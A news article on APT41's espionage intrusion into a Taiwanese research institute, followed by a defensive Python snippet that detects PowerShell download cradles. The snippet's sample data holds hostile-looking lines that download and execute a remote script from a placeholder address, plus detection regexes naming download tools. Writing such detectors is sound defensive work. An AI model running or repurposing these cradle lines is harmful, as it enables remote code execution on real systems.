Chinese APT41 Group Breaches Taiwan Research Institute for Cyber Espionage

August 2, 2024

APT41, a state-sponsored Chinese threat actor, has reportedly infiltrated a Taiwanese research institute affiliated with the government. The institute is known for its research on advanced computing and related technologies. The cyber intrusion began in July 2023, with the threat actors gaining initial access through unspecified means. The group deployed various malware tools, including the notorious ShadowPad remote access Trojan (RAT), the Cobalt Strike post-compromise tool, and a custom loader that injects malware using a 2018 Windows remote code execution vulnerability (CVE-2018-0824).

APT41 is a designation used by several vendors to track a loose collection of China-affiliated threat groups involved in wide-ranging cyber espionage and financially motivated cyberattacks worldwide since 2012. Sub-groups such as Wicked Panda, Winnti, Barium, and SuckFly have been implicated in the theft of trade secrets, intellectual property, and other sensitive data from organizations in the US and other countries. The group has most recently been observed targeting global shipping and logistics companies, as well as organizations in the tech, entertainment, and automotive sectors. Despite the US government indicting several members of the Chengdu-based APT41 in 2020, the group's activities persist unabated.

The intrusion into the Taiwanese research institute was discovered by Cisco Talos researchers during an investigation into unusual activity related to attempts to download and execute PowerShell scripts in the institute's network environment. "The nature of research-and-development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them," stated Talos researchers Joey Chen, Ashley Shen, and Vitor Ventura in a recent report. During the intrusion, APT41 actors breached three systems and stole a number of documents.

ShadowPad, a malware first discovered in the source code of NetSarang Computer's Xmanager server management software in 2017, was initially believed to be exclusively used by APT41. However, over time, multiple China-linked groups have been identified as using the RAT in numerous cyber-espionage campaigns and software supply chain attacks. In the attack on the Taiwanese research institute, APT41 used two different iterations of ShadowPad. The attackers used ShadowPad to map out the victim network, collect data on hosts, and identify other exploitable systems on the same network. The APT was also found to be harvesting passwords and user credentials stored in web browsers from the compromised environment, using tools such as Mimikatz and WebBrowserPassView.

As part of their attack chain, the threat actors also deployed the Cobalt Strike post-compromise tool on the victim network using a loader they cloned from a GitHub project. This was designed to evade antivirus detection tools. "It’s important to highlight that this Cobalt Strike beacon shellcode used steganography to hide in a picture and executed by this loader," the researchers noted. "In other words, its download, decryption, and execution routines all happen in runtime in memory."
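The Talos investigation described above started from attempts to download and execute PowerShell scripts. As an added defender-side example that is not from the article or the Talos report, the Python below scans constructed PowerShell Script Block Logging (Event ID 4104) message text for the download-and-execute "cradle" pattern and for encoded or hidden-window invocations; the regexes, sample lines and the 203.0.113.10 address are all assumptions for illustration.

```python
import re

# Constructed sample script-block texts (not real log data); index 0 and 4 are benign.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')",
    "powershell -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "Invoke-WebRequest -Uri http://203.0.113.10/img.png -OutFile C:\\Temp\\img.png; "
    "Invoke-Expression (Get-Content C:\\Temp\\x.ps1 -Raw)",
    "Get-Service | Where-Object Status -eq Running",
]

# Indicators of fetching remote content.
DOWNLOAD_RE = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|DownloadData|Invoke-WebRequest"
    r"|\biwr\b|Start-BitsTransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
# Indicators of evaluating text as code at runtime.
EXEC_RE = re.compile(r"(\bIEX\b|Invoke-Expression)", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand (but not -eq, -Encoding etc.).
ENCODED_RE = re.compile(r"-e(c|nc|ncodedcommand)?\b", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


def classify_script_block(text):
    """Return the list of indicator names present in one script-block text."""
    indicators = []
    if DOWNLOAD_RE.search(text):
        indicators.append("remote_download")
    if EXEC_RE.search(text):
        indicators.append("dynamic_execution")
    if ENCODED_RE.search(text):
        indicators.append("encoded_command")
    if HIDDEN_RE.search(text):
        indicators.append("hidden_window")
    return indicators


def is_download_cradle(indicators):
    """Download plus in-memory execution, or an encoded command, is worth an alert."""
    has_cradle = "remote_download" in indicators and "dynamic_execution" in indicators
    return has_cradle or "encoded_command" in indicators


def find_download_cradles(blocks):
    """Return (index, indicators) for every block that should be escalated."""
    hits = []
    for i, block in enumerate(blocks):
        indicators = classify_script_block(block)
        if is_download_cradle(indicators):
            hits.append((i, indicators))
    return hits
```

In production the same classifier would run over the ScriptBlockText field of forwarded 4104 events rather than a static list, and hits would be enriched with the user and host that executed the block.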
